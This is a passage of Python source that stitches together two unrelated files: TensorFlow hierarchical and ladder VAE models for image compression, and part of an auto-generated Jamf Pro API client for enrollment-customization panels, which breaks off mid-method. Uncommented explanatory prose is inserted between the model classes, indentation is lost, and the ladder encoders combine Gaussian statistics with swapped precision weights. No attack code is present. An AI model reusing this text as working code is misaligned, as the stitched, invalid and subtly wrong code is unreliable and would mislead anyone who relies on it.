conv_sigma = ConvDS(output_channels=self._bottom_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=False,
name="encoder_conv_sigma")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = self.conv_ds3(self.conv_ds2(self.conv_ds1(inputs)))
mu = self.conv_mu(activations)
sigma = tf.nn.softplus(conv_sigma(activations))
return mu, sigma
@reuse_variables
def decode(self, latents):
"""
Note: reuse_variables is required so that when we call
decode on its own, it uses the trained weights
"""
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
deconv = self.conv_mu.transpose()
deconv_us1 = self.conv_ds3.transpose()
deconv_us2 = self.conv_ds2.transpose()
deconv_us3 = self.conv_ds1.transpose()
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = deconv_us3(deconv_us2(deconv_us1(deconv(latents))))
logits = tf.squeeze(activations)
return logits
# ==============================================================================
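The encoder above emits `mu` and a softplus-positive `sigma`; drawing a posterior sample then uses the reparameterisation trick. A stdlib-only sketch of both steps (helper names are illustrative):

```python
import math
import random

def softplus(x):
    # Numerically safe softplus -- the positivity transform applied to the
    # raw output of the scale head (conv_sigma) in encode() above.
    return math.log1p(math.exp(-abs(x))) + max(x, 0.0)

def sample_posterior(mu, raw_sigma, rng=random):
    # Reparameterised draw: z = mu + softplus(raw_sigma) * eps, eps ~ N(0, 1),
    # which keeps the sample differentiable with respect to mu and raw_sigma.
    return mu + softplus(raw_sigma) * rng.gauss(0.0, 1.0)
```

A very negative raw activation drives the scale toward zero, so the sample collapses onto the mean.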
class ClicLadderCNN(ClicHierarchicalVAE):
def __init__(self,
latent_dist="gaussian",
likelihood="gaussian",
first_level_channels=192,
second_level_channels=128,
first_level_layers=4,
padding_first_level="SAME",
padding_second_level="SAME",
name="clic_ladder_cnn"):
super(ClicLadderCNN, self).__init__(latent_dist=latent_dist,
likelihood=likelihood,
standardized=True,
num_levels=2,
padding_first_level=padding_first_level,
padding_second_level=padding_second_level,
name=name)
self._first_level_channels = first_level_channels
self._second_level_channels = second_level_channels
self._first_level_layers = first_level_layers
@reuse_variables
def encode(self, inputs, level=1, eps=1e-5):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First level
self._first_level = [
ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=True,
name="encoder_level_1_conv_ds{}".format(idx))
for idx in range(1, self._first_level_layers)
]
self._first_level_loc_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_loc")
first_level_scale_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_scale")
# Second level
self._second_level = [
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(3, 3),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=1,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds1"),
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds2")
]
self._second_level_loc_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_loc")
second_level_scale_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_scale")
# The top-down level from the second to the first level
self._topdown_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse, skipping the first layer
for second_level_layer in self._second_level[:0:-1]:
self._topdown_level.append(second_level_layer.transpose())
topdown_loc_head = self._second_level[0].transpose(name="topdown_loc_head")
topdown_scale_head = self._second_level[0].transpose(name="topdown_scale_head")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = inputs
for layer in self._first_level:
activations = layer(activations)
# First stochastic level statistics
first_level_loc = self._first_level_loc_head(activations)
first_level_scale = tf.nn.softplus(first_level_scale_head(activations))
# Passing the loc (not a sample) upwards makes this a probabilistic ladder network
activations = first_level_loc
for layer in self._second_level:
activations = layer(activations)
# Second stochastic level statistics
second_level_loc = self._second_level_loc_head(activations)
second_level_scale = tf.nn.softplus(second_level_scale_head(activations))
# Top distribution
second_level_posterior = self._latent_dist(loc=second_level_loc,
scale=second_level_scale)
activations = second_level_posterior.sample()
latents = (activations,)
for layer in self._topdown_level:
activations = layer(activations)
# Topdown statistics
topdown_loc = topdown_loc_head(activations)
topdown_scale = tf.nn.softplus(topdown_scale_head(activations))
# Combined first level statistics
topdown_scale_sq_inv = 1. / (tf.pow(topdown_scale, 2) + eps)
first_level_scale_sq_inv = 1. / (tf.pow(first_level_scale, 2) + eps)
combined_var = 1. / (topdown_scale_sq_inv + first_level_scale_sq_inv)
combined_scale = tf.sqrt(combined_var)
combined_loc = (topdown_loc * first_level_scale_sq_inv + first_level_loc * topdown_scale_sq_inv) * combined_var
# First level distribution
first_level_posterior = self._latent_dist(loc=combined_loc,
scale=combined_scale)
activations = first_level_posterior.sample()
latents = latents + (activations,)
self._latent_posteriors = [first_level_posterior, second_level_posterior]
return latents
@reuse_variables
def decode(self, latents, decode_level=1):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# Go from top to bottom
# Second level
decoder_second_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._second_level[:0:-1]:
decoder_second_level.append(level.transpose())
first_loc_head = self._second_level[0].transpose(name="decoder_loc_head")
first_scale_head = self._second_level[0].transpose(name="decoder_scale_head")
# First level
decoder_first_level = [
self._first_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._first_level[::-1]:
decoder_first_level.append(level.transpose())
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
if len(latents) != decode_level:
raise ValueError("Length of latents ({}) must equal the decode level ({})".format(len(latents), decode_level))
if decode_level == 2:
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents[0]
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
activations = latents[1]
elif decode_level == 1:
activations = latents[0]
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
# ==============================================================================
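The combined first-level statistics in `ClicLadderCNN.encode` fuse the bottom-up and top-down Gaussian estimates by their precisions. A stdlib sketch mirroring that computation (the function name is illustrative; note the source weights each mean by the *other* branch's precision, whereas the textbook product-of-Gaussians rule weights each mean by its own precision):

```python
def combine_gaussians(loc_a, scale_a, loc_b, scale_b, eps=1e-5):
    # Precision-weighted fusion, mirroring combined_loc / combined_scale
    # in ClicLadderCNN.encode above.
    prec_a = 1.0 / (scale_a ** 2 + eps)
    prec_b = 1.0 / (scale_b ** 2 + eps)
    var = 1.0 / (prec_a + prec_b)
    # As in the source: each loc is multiplied by the other branch's
    # precision (the standard rule would use its own precision instead).
    loc = (loc_a * prec_b + loc_b * prec_a) * var
    return loc, var ** 0.5
```

When both branches report unit scale, the fused estimate is their average with a reduced scale of about `1/sqrt(2)`, which is the behaviour one would expect from combining two equally confident estimates.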
class ClicHyperVAECNN(ClicHierarchicalVAE):
def __init__(self,
latent_dist="gaussian",
likelihood="gaussian",
first_level_channels=192,
second_level_channels=128,
first_level_layers=4,
padding_first_level="SAME",
padding_second_level="SAME",
name="clic_hyper_vae"):
super(ClicHyperVAECNN, self).__init__(latent_dist=latent_dist,
likelihood=likelihood,
standardized=True,
num_levels=2,
padding_first_level=padding_first_level,
padding_second_level=padding_second_level,
name=name)
self._first_level_channels = first_level_channels
self._second_level_channels = second_level_channels
self._first_level_layers = first_level_layers
@reuse_variables
def encode(self, inputs, level=1, eps=1e-5):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First level
self._first_level = [
ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=True,
name="encoder_level_1_conv_ds{}".format(idx))
for idx in range(1, self._first_level_layers)
]
self._first_level_loc_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_loc")
first_level_scale_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_scale")
# Second level
self._second_level = [
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(3, 3),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=1,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds1"),
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds2")
]
self._second_level_loc_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_loc")
second_level_scale_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_scale")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = inputs
for layer in self._first_level:
activations = layer(activations)
# First stochastic level statistics
first_level_loc = self._first_level_loc_head(activations)
first_level_scale = tf.nn.softplus(first_level_scale_head(activations))
first_level_posterior = self._latent_dist(loc=first_level_loc, scale=first_level_scale)
# Unlike the ladder variants, the second level here consumes a sample
# from the first-level posterior rather than its loc
activations = first_level_posterior.sample()
latents = (activations,)
for layer in self._second_level:
activations = layer(activations)
# Second stochastic level statistics
second_level_loc = self._second_level_loc_head(activations)
second_level_scale = tf.nn.softplus(second_level_scale_head(activations))
# Top distribution
second_level_posterior = self._latent_dist(loc=second_level_loc,
scale=second_level_scale)
activations = second_level_posterior.sample()
latents = (activations,) + latents
self._latent_posteriors = [first_level_posterior, second_level_posterior]
return latents
@reuse_variables
def decode(self, latents, decode_level=1):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# Go from top to bottom
# Second level
decoder_second_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._second_level[:0:-1]:
decoder_second_level.append(level.transpose())
first_loc_head = self._second_level[0].transpose(name="decoder_loc_head")
first_scale_head = self._second_level[0].transpose(name="decoder_scale_head")
# First level
decoder_first_level = [
self._first_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._first_level[::-1]:
decoder_first_level.append(level.transpose())
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
if len(latents) != decode_level:
raise ValueError("Length of latents ({}) must equal the decode level ({})".format(len(latents), decode_level))
if decode_level == 2:
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents[0]
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
activations = latents[1]
elif decode_level == 1:
activations = latents[0]
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
# ==============================================================================
class ClicLadderCNN2(ClicHierarchicalVAE):
def __init__(self,
latent_dist="gaussian",
likelihood="gaussian",
first_level_channels=192,
second_level_channels=128,
first_level_layers=4,
padding_first_level="SAME",
padding_second_level="SAME",
name="clic_ladder_cnn2"):
super(ClicLadderCNN2, self).__init__(latent_dist=latent_dist,
likelihood=likelihood,
standardized=True,
num_levels=2,
padding_first_level=padding_first_level,
padding_second_level=padding_second_level,
name=name)
self._first_level_channels = first_level_channels
self._second_level_channels = second_level_channels
self._first_level_layers = first_level_layers
@reuse_variables
def encode(self, inputs, level=1, eps=1e-6):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First level
self._first_level = [
ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=True,
name="encoder_level_1_conv_ds{}".format(idx))
for idx in range(1, self._first_level_layers)
]
self._first_level_loc_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_loc")
first_level_scale_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_scale")
# Second level
self._second_level = [
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(3, 3),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=1,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds1"),
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds2")
]
self._second_level_loc_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_loc")
second_level_scale_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_scale")
# The top-down level from the second to the first level
self._topdown_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse, skipping the first layer
for second_level_layer in self._second_level[:0:-1]:
self._topdown_level.append(second_level_layer.transpose())
self._topdown_loc_head = self._second_level[0].transpose(name="topdown_loc_head")
self._topdown_scale_head = self._second_level[0].transpose(name="topdown_scale_head")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = inputs
for layer in self._first_level:
activations = layer(activations)
# First stochastic level statistics
first_level_loc = self._first_level_loc_head(activations)
# Note: unlike ClicLadderCNN, this head's softplus output is used directly
# as a precision (inverse variance) rather than as a scale
first_level_precision = tf.nn.softplus(first_level_scale_head(activations))
# Passing the loc (not a sample) upwards makes this a probabilistic ladder network
activations = first_level_loc
for layer in self._second_level:
activations = layer(activations)
# Second stochastic level statistics
second_level_loc = self._second_level_loc_head(activations)
# The sigmoid activation enforces that the posterior variance is always less than
# the prior variance (which is 1)
second_level_scale = tf.nn.sigmoid(second_level_scale_head(activations))
# Top distribution
second_level_posterior = self._latent_dist(loc=second_level_loc,
scale=second_level_scale)
activations = second_level_posterior.sample()
latents = (activations,)
for layer in self._topdown_level:
activations = layer(activations)
# Topdown statistics
topdown_loc = self._topdown_loc_head(activations)
topdown_scale = tf.nn.softplus(self._topdown_scale_head(activations))
# Combined first level statistics
topdown_precision = 1. / (tf.pow(topdown_scale, 2) + eps)
combined_var = 1. / (topdown_precision + first_level_precision)
combined_scale = tf.sqrt(combined_var)
combined_loc = (topdown_loc * first_level_precision + \
first_level_loc * topdown_precision) * combined_var
# First level distribution
first_level_posterior = self._latent_dist(loc=combined_loc,
scale=combined_scale)
activations = first_level_posterior.sample()
latents = latents + (activations,)
self._latent_posteriors = [first_level_posterior, second_level_posterior]
return latents
@reuse_variables
def decode(self, latents, decode_level=1):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# Go from top to bottom
# Second level
decoder_second_level = self._topdown_level
first_loc_head = self._topdown_loc_head
first_scale_head = self._topdown_scale_head
# First level
decoder_first_level = [
self._first_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._first_level[::-1]:
decoder_first_level.append(level.transpose())
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
# if len(latents) != decode_level:
# raise InvalidArgumentError("Length of latents ({}) has to equal to level number {}".format(len(latents), decode_level))
if decode_level == 2:
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents[0]
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
activations = latents[1]
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
elif decode_level == "second":
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
return first_loc, first_scale
elif decode_level == "first":
activations = latents
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
return None
# ==============================================================================
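The comment in `ClicLadderCNN2.encode` argues that a sigmoid-activated scale head keeps the second-level posterior standard deviation strictly inside (0, 1), i.e. always below the unit prior scale. A quick stdlib check of that claim (function name is illustrative):

```python
import math

def sigmoid(x):
    # Logistic function applied to the second-level scale head in
    # ClicLadderCNN2.encode; its range (0, 1) bounds the posterior
    # standard deviation strictly below the unit prior scale.
    return 1.0 / (1.0 + math.exp(-x))

# Any raw activation maps to a valid, sub-unit scale.
scales = [sigmoid(x) for x in (-10.0, -1.0, 0.0, 1.0, 10.0)]
```

This contrasts with the softplus heads used elsewhere, whose output is unbounded above.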
# coding: utf-8
"""
Jamf Pro API
## Overview This is a sample Jamf Pro server which allows for usage without any authentication. The Jamf Pro environment which supports the Try it Out functionality does not run the current beta version of Jamf Pro, thus any newly added endpoints will result in an error and should be used solely for documentation purposes. # noqa: E501
The version of the OpenAPI document: 10.25.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from jamf.api_client import ApiClient
from jamf.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class EnrollmentCustomizationPreviewApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v1_enrollment_customization_id_all_get(self, id, **kwargs): # noqa: E501
"""Get all Panels for single Enrollment Customization # noqa: E501
Get all panels for single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_get(id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: EnrollmentCustomizationPanelList
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_all_get_with_http_info(id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_all_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Get all Panels for single Enrollment Customization # noqa: E501
Get all panels for single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(EnrollmentCustomizationPanelList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_all_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_all_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "EnrollmentCustomizationPanelList",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/all', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_all_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single Panel from an Enrollment Customization # noqa: E501
Delete a single panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_all_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_all_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single Panel from an Enrollment Customization # noqa: E501
Delete a single panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_all_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_all_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_all_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/all/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
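# Usage sketch (hypothetical values; assumes the enclosing API class is
# named EnrollmentCustomizationApi and that `api_client` is already
# configured, neither of which is shown in this excerpt):
#
#     api = EnrollmentCustomizationApi(api_client)
#     # Synchronous delete of panel 2 from enrollment customization 1;
#     # returns None on success, typically raising ApiException on a 404.
#     api.v1_enrollment_customization_id_all_panel_id_delete(1, 2)
#
#     # Asynchronous variant: returns the request thread immediately.
#     thread = api.v1_enrollment_customization_id_all_panel_id_delete(
#         1, 2, async_req=True)
#     thread.get()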
def v1_enrollment_customization_id_all_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Panel for a single Enrollment Customization # noqa: E501
Get a single panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanel
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_all_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_all_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Panel for a single Enrollment Customization # noqa: E501
Get a single panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanel, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_all_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
